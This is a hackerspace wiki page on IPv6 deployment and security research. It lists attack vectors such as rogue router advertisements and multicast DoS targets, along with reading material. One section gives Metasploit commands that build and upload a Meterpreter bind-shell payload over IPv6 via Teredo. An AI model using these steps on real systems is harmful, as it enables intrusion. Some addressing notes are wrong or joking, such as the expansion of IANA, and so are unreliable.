====== IPv6 ======
{{template>:project:infobox_remoteimg|
name=IPv6|
image=ipv6-badge-blk-128-trans.png?200|
sw=|
founder=[[user:ruza]]|
interested=[[user:kxt]], [[user:biiter]]|
status=active}}

~~META:
status = active
&relation firstimage = :project:ipv6-badge-blk-128-trans.png
~~

===== Goals of the Project =====

  * [[wp>IPv6]] deployment 
  * education
  * security research related to IPv6
===== Status and Plan =====

The project is currently in the planning stage.

  * [DONE] our website http://brmlab.cz is accessible on IPv6

==== World IPv6 day (8 June 2011) ====

  * [DONE] we participate in World IPv6 day
[[http://isoc.org/wp/worldipv6day/ipv6-enabled-websites/|{{ :project:ipv6-badge-blk-128-trans.png?nolink&200 |}}]]

==== World IPv6 launch (6 June 2012) ====

[[http://www.worldipv6launch.org/|{{  :project:world_ipv6_launch_badge_128.png?  }}]]

==== 6or4 checkicon guy for your website ====

Check your web server support [[https://httpd.apache.org/docs/current/mod/mod_include.html|SSI]]

<code apache /etc/apache2/sites-enabled/000-default>
SetEnvIf Server_Addr "^2001:" IPV6
</code>

<code bash>
wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png
wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png
</code>

<code html index.html>
<!--#if expr="$IPV6"--><img src="/images/ipv6.png" alt="IPv6 smile" />
  <!--#else -->        <img src="/images/ipv4.png" alt="IPv4 sad" />
<!--#endif -->
</code>
===== Topics (attack vectors) =====

==== Introduction to IPv6 ====

  * [[http://www.oreillynet.com/onlamp/blog/2003/06/what_ever_happened_to_ipv5.html|What ever happened to IPv5?]] [[http://etherealmind.com/what-was-ipv5-version-5-ip/|2]]
  * [[http://www.bieringer.de/linux/IPv6/IPv6-HOWTO/IPv6-HOWTO-6.html|quick intro]]
  * [[https://wiki.kubuntu.org/IPv6|IPv6 on Ubuntu]] and [[https://wiki.kubuntu.org/IPv6|KUbuntu]]
  * [[http://tldp.org/HOWTO/Linux+IPv6-HOWTO/x811.html|IPv6-ready test/debug programs]]
  * [[http://labs.ripe.net/Members/gih/testing-teredo|Testing Teredo]] (labs.ripe.net)

==== IPv6 Addressing Architecture ====

  * The address notation for IPv6 is a group of 16 2-digit hexadecimal numbers, separated with a ':', global addresses are allocated by [[wp>IANA]] (Ip Address Not Available)
  * "::" stands for a string of 0 bits.
  * Special addresses are ::1 for loopback
  * ::FFFF:<IPv4 address> for IPv4-mapped-on-IPv6
  * fe00::0/8 ip6-localnet
  * ff00::0 ip6-mcastprefix
  * fe80::/10 individuální lokální linkové

  * broadcast -> multicast

Finding IPv6 hosts
  * DNS (highly dependent), server logs
  * MAC address allocations (EUI-64 standard)

  * DoS targets [[http://www.iana.org/assignments/ipv6-multicast-addresses/ipv6-multicast-addresses.xml|1]]
    * 3 site-local multicast addresses
      * FF05::2 all-routers
      * FF05::FB mDNSv6
      * FF05::1:3 all DHCP servers
    * Several link-local multicast addresses
      * FF02::1 all nodes
      * FF02::2 all routers
      * FF02::F all UPnP
      * ... (RFCs :?:)
    * Some deprecated (RFC 3879) site-local addresses but still used
      * FEC0:0:0:FFFF::1 DNS server

http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1

==== IPv6 Header Fields ====
  * [[https://www.ipv6.cz/Form%C3%A1t_datagramu|Formát_datagramu]]
==== IPv6 Extension Headers ====
  * unlimited size of header chain DoS aka Routing header DoS vs RFC 5095

==== IPv6 Privacy Extensions (RFC 3041) ====
  * temporary address for host client application (eg. www browser)
  * random 64bit ID
  * can be disabled by Group POlicy Object (win) or DHCP

==== IPv6 Options ====
==== IPsec ====
  * IPsec not required by IPv6
  * blinds IPS, firewalls, ACLs
  * network security relies more on endpoint security!
  * DoS, malformed packets, spoofed and unprotected IKE messages (ICSA Labs methology)
==== Internet Control Message Protocol version 6 (ICMPv6) ====
  * more relied upon
  * moar types

==== Neighbor Discovery for IPv6 ====
  * NDP replaces ARP
    * not authenticated
    * static entries overwritten by dynamic ones
  * SEND (SEcure Neighbor Discovery)
==== Multicast Listener Discovery ====
==== Mobility (RFC 3775) ====

  * http://natisbad.org/MIPv6/ [TODO]
  * IPSEC VPN over IPv6 called [[http://danstoncloud.com/blogs/simplebydesign/archive/2011/10/08/directaccess-in-windows-8-sneak-preview.aspx|Microsoft Direct Access]] (Win 2008 server, Win8)


==== Address Auto-configuration ====
  * stateles (SLAAC)
    * rogue Router Advertisement (DoS, MiTM)
    * fe80:: (local link) + MAC (EUI-64)
  * statefull DHCPv6, RFC 3315

==== Dynamic Host Configuration Protocol version 6 (DHCPv6) ====
==== Application support for IPv6 ====
  * [[http://www.getipv6.info/index.php/Customer_problems_that_could_occur]]

==== IPv6 firewalls ====
  * ipv6 default policy allowed, not inspected
  * imany icmp6 types needs to be allowed too
  * how to build and maintain antispam reputation databases?
  * fragmentation and reassembly is done only by the end system

==== Transition/co-existence technologies (6to4, Teredo, ISATAP, etc.) ====
==== Security Implications of IPv6 on IPv4-only networks ====
  * running teredo/miredo you are using public IP address :!:
  * [[wp>IPv6_brokenness_and_DNS_whitelisting]]

==== Exploiting over IPv6 ====
  * [[http://www.uninformed.org/?v=10&a=3|Penetration Testing with IPv6, 10/2008, hdm]]
  * you dont want that miredo service start everytime (update-rc.d -f miredo remove).
  * Faking IP address FIXME

=== Windows ===
  int ipv6 install
  netsh int ipv6 set teredo [enterpriseclient|client] #(enterpriseclient gives you and public ip)
  netsh int ipv6 show teredo # we need qualified State
  
  msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe
  upload bind.exe
  msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
  
[[http://vimeo.com/15243189]]

==== IPv6 implementation (network devices testing) ====
  * [[wp>Comparison_of_IPv6_support_in_routers]]
  * [[http://www-x.antd.nist.gov/usgv6/index.html|NIST tested products reports]] (ICSA labs)

===== Papers, books =====

  * [[http://www.thc.org/papers/vh_thc-ipv6_attack.pdf|Attacking the IPv6 Protocol Suite,
van Hauser, THC]]
  * [[http://ipv6-ghent.fi-week.eu/files/2010/12/1300-2-Vyncke.pdf|IPv6 security vendor Point of View, Vyncke, Cisco]]
  * 39. Europen.cz, sbornik
  * Cisco-Press-IPv6-Security-2009.pdf (@data)
  * Cisco.Press.IPv6.for.Enterprise.Networks.Mar.2011.pdf (@data)
  * Implementace_IPv6-CZNIC_academy.pdf (@data), [[http://www.nic.cz/akademie/course/18/detail/|CZ NIC akademie]]
  * [[http://knihy.nic.cz/files/nic/edice/pavel_satrapa_ipv6_2011.pdf|{{:project:ipv6_book.png}}]]\\ Pavel Satrapa, 2011

===== Links =====

  * [[https://www.ipv6.cz/Co_je_IPv6|IPv6 wiki]]
  * [[http://knihy.nic.cz/ipv6/|HowTo make IPv6 prefered for teredo/miredo]] (related to [[http://www.akkadia.org/drepper/linux-rfc3484.html|RFC3484]])
  * [[http://petrkrcmar.blog.root.cz/2010/10/25/cim-si-vyzkouset-ipv6/|Čím si vyzkoušet IPv6?]] (root.cz)
  * [[http://www.sixxs.net/wiki/IPv6_Specific_Content_in_Apache|IPv6_Specific_Content_in_Apache]]
  * telnet -6 towel.blinkenlights.nl  (extra scenes)

===== Tools =====

  * [[http://ipv6-test.com/|IPv6 test]] :!:
  * [[http://www.thc.org/thc-ipv6/|THC-IPv6]] attack tool
  * [[http://www.hart.co.jp/ipv6/ipv6check.php|back{trace,ping} yourself]]
  * [[http://ipv6-speedtest.net/]]